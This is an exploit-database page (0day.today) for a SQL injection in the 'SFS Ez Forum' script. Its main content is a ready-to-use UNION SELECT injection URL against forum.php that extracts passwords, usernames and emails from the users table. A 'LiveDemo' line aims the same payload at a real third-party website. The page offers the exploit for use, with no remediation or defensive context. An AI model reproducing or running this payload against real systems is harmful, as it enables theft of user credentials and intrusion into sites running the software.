[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SFS Ez Forum (forum.php id) SQL Injection Vulnerability

Author
Hurley
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3955
Category
web applications
Date add
25-10-2008
Platform
unsorted
=======================================================
SFS Ez Forum (forum.php id) SQL Injection Vulnerability
=======================================================


==================================================================================
      SFS Forum (forum.php id) Remote SQL Injection Vulnerability
==================================================================================
			   __  __           __          
			   / / / /_  _______/ /__  __  __
			  / /_/ / / / / ___/ / _ \/ / / /
			 / __  / /_/ / /  / /  __/ /_/ / 
			/_/ /_/\__,_/_/  /_/\___/\__, /  
			                        /____/   
==================================================================================
----------------------------------------------------------------------------------
Website script: http://www.scripts-for-sites.info/index.php
----------------------------------------------------------------------------------
Exploit:      http://localHost/forum/forum.php?forum=-9999+union+all+select+null,concat_ws(0x3a,password,username,%20email),null,null+from+users/*
----------------------------------------------------------------------------------
LiveDemo:
http://www.turnkeyzone.com/demos/forum/forum.php?forum=-9999+union+all+select+null,concat_ws(0x3a,password,username,%20email),null,null+from+users/*
----------------------------------------------------------------------------------



#  0day.today [2024-12-24]  #